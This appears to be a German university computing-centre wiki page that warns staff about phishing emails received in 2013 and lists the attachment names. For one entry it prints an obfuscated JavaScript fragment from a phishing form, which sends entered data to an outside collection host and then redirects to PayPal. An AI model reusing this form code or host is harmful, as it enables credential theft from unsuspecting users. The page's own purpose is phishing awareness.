Wiki Rechenzentrum Hochschule Schmalkalden

Eingang am 4. Juli 2013:

ihre_online-banking.pdf

Eingang am 6. Juli 2013:

ihr_webmail-konto_hat_sein_limit_überschritten._.pdf

Eingang am 14.Aug.2013:

bestätigen_email-benachrichtigung.pdf

Eingang am 09.Sept. 2013:

meldung.pdf

Eingang am 10.Sept. 2013: sicherheitsmassnahmen.pdf mit diesem HTML-Formular im Anhang.

Abgesendet wird das Formular an diese url: http://mirondeladelsarts.com/sender.php, die wiederum in diesem javascript-schnipsel verborgen ist:

document.write(unescape('%3C%2F%74%64%3E%0A%20%20%20%20%3C%2F%74%72%3E%3C%74%72%3E%0A%20%20%20%20%20%20%3C%74%64%20%69%64%3D%22%62%6F%64%79%22%3E%20%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%46%46%46%46%46%46%22%3E%2E%3C%2F%66%6F%6E%74%3E%42%69%74%74%65%20%66%26%75%75%6D%6C%3B%6C%6C%65%6E%20%53%69%65%20%61%6C%6C%65%20%46%65%6C%64%65%72%20%61%75%73%2E%3C%62%72%20%2F%3E%0A%20%20%20%20%20%20%20%20%3C%66%6F%72%6D%20%6E%61%6D%65%3D%22%72%61%66%22%20%61%63%74%69%6F%6E%3D%22%68%74%74%70%3A%2F%2F%6D%69%72%6F%6E%64%65%6C%61%64%65%6C%73%61%72%74%73%2E%63%6F%6D%2F%73%65%6E%64%65%72%2E%70%68%70%22%20%6D%65%74%68%6F%64%3D%22%70%6F%73%74%22%20%6F
%6E%73%75%62%6D%69%74%3D%22%72%65%74%75%72%6E%20%76%61%6C%69%64%61%74%65%28%74%6
8%69%73%29%22%3E%3C%69%6E%70%75%74%20%74%79%70%65%3D%22%68%69%64%64%65%6E%22%20%
6E%61%6D%65%3D%22%72%65%64%69%72%22%20%76%61%6C%75%65%3D%22%68%74%74%70%73%3A%2F
%2F%77%77%77%2E%70%61%79%70%61%6C%2E%63%6F%6D%2F%22%20%2F%3E%0A%20%20%20%20%20%2
0%20%20%20%20%3C%74%61%62%6C%65%20%69%64%3D%22%66%6F%72%6D%22%3E%0A%20%20%20%20%
20%20%20%20%20%20%20%20%3C%74%72%3E%20'));

Es wird sofort an eine offizielle PayPal-Seite umgeleitet.

http://www.uni-weimar.de/de/universitaet/struktur/zentrale-einrichtungen/scc-rechenzentrum/it-sicherheit/phishing/phishing-e-mails/